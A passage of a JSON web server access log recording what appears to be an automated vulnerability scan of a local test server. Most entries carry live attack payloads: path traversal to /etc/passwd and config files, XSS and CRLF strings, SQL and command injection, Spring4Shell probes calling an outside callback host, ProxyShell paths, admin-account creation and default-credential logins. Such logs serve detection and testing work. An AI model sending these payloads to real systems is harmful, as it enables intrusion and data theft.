+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/help/support HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/33 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22username\x22: \x22testpoc\x22, \x22has_admin_role\x22: true, \x22password\x22: \x22TestPoc!\x22, \x22email\x22: \x22testpoc@example.com\x22, \x22realname\x22: \x22poc\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"j_username=admin&j_password=admin&from=%2F&Submit=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/snapshots/:key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_canteen&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/34 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cas/v1/tickets/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/35 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/mobile.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=0776a6f87a8143af12c1e7bbd0bf4197 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":" \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://ca2u0eosmpv1jhs80ca0sic7npo7ecuyk.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/36 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 